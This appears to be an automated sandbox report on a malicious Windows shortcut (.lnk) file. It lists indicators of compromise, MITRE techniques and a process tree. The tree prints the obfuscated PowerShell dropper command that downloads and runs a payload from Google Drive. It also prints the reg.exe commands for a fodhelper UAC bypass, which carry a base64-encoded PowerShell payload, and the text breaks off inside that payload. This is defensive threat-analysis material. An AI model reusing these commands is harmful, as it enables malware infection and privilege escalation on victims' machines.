08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b

Resubmissions

09/11/2024, 05:12

241109-fvyq9s1mdl 10

26/09/2024, 17:08

240926-vnlkpa1gnd 10

Analysis

max time kernel
236s
max time network
276s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09/11/2024, 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
Size

3KB
MD5

58657e9d42041b92fc229395bec9129f
SHA1

6dfd0ba65d061b6cd7b8e1126553a09c85f58878
SHA256

08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b
SHA512

b7d527a70826e5e8813812936ad70b0bab005ee8d793ff3e940cae5aac0b78e21a5d9e9d24f9a3a885b1438d576e72de5838c404f60c5306a501249a03acc2f8

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UUcYiqZwEV_WiJu15EZ3CoLRbDBqVoEg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1yzIedgOlbPjUc006zFjrkRkJWDbchF0u

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
4	4576	powershell.exe
8	4576	powershell.exe
29	4684	powershell.exe
30	4684	powershell.exe
43	1552	powershell.exe
44	1552	powershell.exe
57	4576	powershell.exe
59	4576	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	SystemSettings.Security.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 7 IoCs

pid	Process
1780	SystemProcessHost.SystemProcesses
2804	SystemProcessHost.SystemProcesses.exe
2112	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
4888	SystemSettings.Security
1892	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe
3428	SystemSettings.Security
4208	SystemSettings.Security.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1552	powershell.exe
4576	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
57	drive.google.com
60	drive.google.com
62	drive.google.com
3	drive.google.com
4	drive.google.com
29	drive.google.com
43	drive.google.com
56	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2112	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
1892	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 64 IoCs

evasion

pid	Process
3964	taskkill.exe
4668	taskkill.exe
4132	taskkill.exe
2300	taskkill.exe
3988	taskkill.exe
3028	taskkill.exe
1540	taskkill.exe
4000	taskkill.exe
1948	taskkill.exe
1132	taskkill.exe
2620	taskkill.exe
4460	taskkill.exe
4904	taskkill.exe
1072	taskkill.exe
2700	taskkill.exe
3892	taskkill.exe
4140	taskkill.exe
4624	taskkill.exe
4420	taskkill.exe
2372	taskkill.exe
1544	taskkill.exe
396	taskkill.exe
3572	taskkill.exe
1944	taskkill.exe
3428	taskkill.exe
3892	taskkill.exe
2204	taskkill.exe
1860	taskkill.exe
2112	taskkill.exe
4712	taskkill.exe
4924	taskkill.exe
4804	taskkill.exe
3704	taskkill.exe
3452	taskkill.exe
2560	taskkill.exe
3356	taskkill.exe
1132	taskkill.exe
2460	taskkill.exe
2280	taskkill.exe
1876	taskkill.exe
2304	taskkill.exe
2376	taskkill.exe
4920	taskkill.exe
3944	taskkill.exe
2340	taskkill.exe
1600	taskkill.exe
1608	taskkill.exe
4264	taskkill.exe
4676	taskkill.exe
2668	taskkill.exe
5080	taskkill.exe
1936	taskkill.exe
3028	taskkill.exe
4536	taskkill.exe
1064	taskkill.exe
4800	taskkill.exe
2460	taskkill.exe
2016	taskkill.exe
2232	taskkill.exe
4132	taskkill.exe
3040	taskkill.exe
4336	taskkill.exe
4444	taskkill.exe
2144	taskkill.exe

Modifies registry class 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\CurVer\ = ".alecar"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\CurVer	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open\command\ = "C:\\Users\\Public\\Music\\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA="	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\CurVer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	fodhelper.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\.alecar\Shell\Open	reg.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
3608	reg.exe
2320	reg.exe
2560	reg.exe
4444	reg.exe

Opens file in notepad (likely ransom note) 3 IoCs

ransomware

pid	Process
4712	NOTEPAD.EXE
2244	NOTEPAD.EXE
396	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4576	powershell.exe
4576	powershell.exe
1552	powershell.exe
1552	powershell.exe
1552	powershell.exe
4424	PoWeRsHeLl.exe
4888	SystemSettings.Security
4424	PoWeRsHeLl.exe
4888	SystemSettings.Security
1032	PoWeRsHeLl.exe
1032	PoWeRsHeLl.exe
3428	SystemSettings.Security
3428	SystemSettings.Security
4208	SystemSettings.Security.exe
4208	SystemSettings.Security.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	4132	taskkill.exe
Token: SeDebugPrivilege	3120	taskkill.exe
Token: SeDebugPrivilege	4420	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	2432	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2620	taskkill.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	1544	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	4920	taskkill.exe
Token: SeDebugPrivilege	3252	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	3016	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	4712	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	4924	taskkill.exe
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	2668	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	4140	taskkill.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	2376	taskkill.exe
Token: SeDebugPrivilege	2800	taskkill.exe
Token: SeDebugPrivilege	4424	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	4920	taskkill.exe
Token: SeDebugPrivilege	3492	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	4000	taskkill.exe
Token: SeDebugPrivilege	4132	taskkill.exe
Token: SeDebugPrivilege	4756	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeDebugPrivilege	4168	taskkill.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe
4672	OpenWith.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 3720 wrote to memory of 4576	3720	cmd.exe	84
PID 3720 wrote to memory of 4576	3720	cmd.exe	84
PID 4576 wrote to memory of 1372	4576	powershell.exe	97
PID 4576 wrote to memory of 1372	4576	powershell.exe	97
PID 1372 wrote to memory of 2244	1372	cmd.exe	98
PID 1372 wrote to memory of 2244	1372	cmd.exe	98
PID 4576 wrote to memory of 2560	4576	powershell.exe	105
PID 4576 wrote to memory of 2560	4576	powershell.exe	105
PID 4576 wrote to memory of 4444	4576	powershell.exe	106
PID 4576 wrote to memory of 4444	4576	powershell.exe	106
PID 4576 wrote to memory of 2804	4576	powershell.exe	107
PID 4576 wrote to memory of 2804	4576	powershell.exe	107
PID 2804 wrote to memory of 1780	2804	fodhelper.exe	108
PID 2804 wrote to memory of 1780	2804	fodhelper.exe	108
PID 1780 wrote to memory of 4684	1780	SystemProcessHost.SystemProcesses	109
PID 1780 wrote to memory of 4684	1780	SystemProcessHost.SystemProcesses	109
PID 4576 wrote to memory of 3608	4576	powershell.exe	114
PID 4576 wrote to memory of 3608	4576	powershell.exe	114
PID 4576 wrote to memory of 2320	4576	powershell.exe	115
PID 4576 wrote to memory of 2320	4576	powershell.exe	115
PID 4672 wrote to memory of 396	4672	OpenWith.exe	214
PID 4672 wrote to memory of 396	4672	OpenWith.exe	214
PID 4576 wrote to memory of 3608	4576	powershell.exe	234
PID 4576 wrote to memory of 3608	4576	powershell.exe	234
PID 3608 wrote to memory of 2112	3608	cmd.exe	235
PID 3608 wrote to memory of 2112	3608	cmd.exe	235
PID 2112 wrote to memory of 4424	2112	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas	236
PID 2112 wrote to memory of 4424	2112	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas	236
PID 2112 wrote to memory of 4888	2112	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas	238
PID 2112 wrote to memory of 4888	2112	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas	238
PID 1892 wrote to memory of 1032	1892	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe	245
PID 1892 wrote to memory of 1032	1892	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe	245
PID 1892 wrote to memory of 3428	1892	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe	247
PID 1892 wrote to memory of 3428	1892	Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe	247

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\08b85c072d8fba2adda8956c1ee3e086370efd8465700fee83aea4aedb4fdc0b.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /""W 0""1 ""-Non""Inte""ract""ive ""-No""Prof""ile ""-Exe""cut""ionPo""licy ""Byp""ass $kZ788UmuOaf8KSE4Z2z1X6JZe3y3Vjtpe1NrZt5Y37yS32l2QZY34a0xrE0bgk9Z0CSrya87I46tBE9T37wyHxdL4gcbIRpe35OVT7M8fVtfDmDYctLDm2Bv6Cf0LDl7QioQk4KvVVb4CSA8U6wS61gEWbVMm14jtFYSx4S5i0sFjeC3fd4KF6XtKMek3Iig25iUp7fz9W1PaK650qbQkZx349PFYI7BkF4s2pS56jddf5JEZvV751FiZk17tm0j5A6dp70sFbvpg8hNNw3kI6wI7TCIktLZrXkPMlK8nixxPGN11UIiIf169df177gNe2AfYzFm4='i""Ex';sal uzbekistanac $kZ788UmuOaf8KSE4Z2z1X6JZe3y3Vjtpe1NrZt5Y37yS32l2QZY34a0xrE0bgk9Z0CSrya87I46tBE9T37wyHxdL4gcbIRpe35OVT7M8fVtfDmDYctLDm2Bv6Cf0LDl7QioQk4KvVVb4CSA8U6wS61gEWbVMm14jtFYSx4S5i0sFjeC3fd4KF6XtKMek3Iig25iUp7fz9W1PaK650qbQkZx349PFYI7BkF4s2pS56jddf5JEZvV751FiZk17tm0j5A6dp70sFbvpg8hNNw3kI6wI7TCIktLZrXkPMlK8nixxPGN11UIiIf169df177gNe2AfYzFm4;uzbekistanac(uzbekistanac($($('(n""QNVrd3W""2GjJK36w-oBJQ""NVrd3W2G""jJK36ct sY""stQNV""rd3W""2GjJK36m.NQNVrd3""W2GjJK36t.WQN""Vrd3W2GjJK36bcLi""QNVrd3W2GjJ""K36nt"")"".dos""2Wr6qQRtR""InG(''hfTdH8C6drivz2Wr6qQR.gs97YMGcyg0WCrs97YMGcyg0WCrglz2Wr6qQR.cs97YMGcyg0WCrm/uc?z2Wr6qQRxps97YMGcyg0WCrrt=ds97YMGcyg0WCrwnls97YMGcyg0WCrad&id=1UUcYiqZwEV_WiJu15EZ3Cs97YMGcyg0WCrLRbDBqVs97YMGcyg0WCrEg''.rEpLACe(''fTdH8C6'',''ttps://'').rEpLACe(''s97YMGcyg0WCr'',''o'').rEpLACe(''z2Wr6qQR'', ''e''))').rEpLACe('QNVrd3W2GjJK36', 'e').rEpLACe('s2W""r6qQR', 'wnlo""adS'))))
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start C:/ProgramData/VipPassword.txt
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\VipPassword.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:2244
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.alecar\Shell\Open\command /d "C:\Users\Public\Music\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpA